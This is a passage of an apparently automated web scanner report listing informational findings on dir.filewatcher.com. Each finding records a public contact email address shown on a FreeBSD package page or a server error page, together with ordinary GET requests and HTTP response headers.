24.19. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZdEUUKqgOBWrwlZy7TjtZA"
Content-Length: 20741
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 195
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.20. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/ia64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/ia64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 194
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.21. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

GET /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+zdjYtQZqpO3zHKlkKVj6Q"
Content-Length: 25529
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 192
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.22. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 193
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.23. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+frb9HphK5dyFIISMCQmg"
Content-Length: 26078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.24. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.2-release/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6.2-release/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 234
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.25. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IX+4NbTcwTYmvINLD7P4yg"
Content-Length: 22277
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.26. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6.3-release/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.27. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m14cFzBrRTyJJddwL+HG4g"
Content-Length: 25745
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.28. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/i386.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6.3-release/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.29. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MrP66mXsA4WtHHC/w3asQw"
Content-Length: 25643
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.30. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pAEPFOHU2mnYiuFV7WGw+w"
Content-Length: 25095
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 216
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.31. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/ia64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/7-current/ia64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 228
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.32. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "L0usVmTHrXrSD7hv8gWhAg"
Content-Length: 23138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.33. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 204
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.34. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ELLhiiMD7yqGLFeQ0s87kA"
Content-Length: 25796
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.35. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/i386.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 204
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.36. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhgQiQdlEC4RQFMip3u91w"
Content-Length: 25724
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 205
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.37. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.38. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GjJmICQXTmvRx3IXwKzHFg"
Content-Length: 26054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 203
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.39. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Issue detail

The following email address was disclosed in the response:

obrien@NUXI.com

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s2mj51RYwAHAE2nf1YJJzg"
Content-Length: 25311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.40. http://dir.filewatcher.com/d/FreeBSD/distfiles/Other.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/distfiles/Other.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

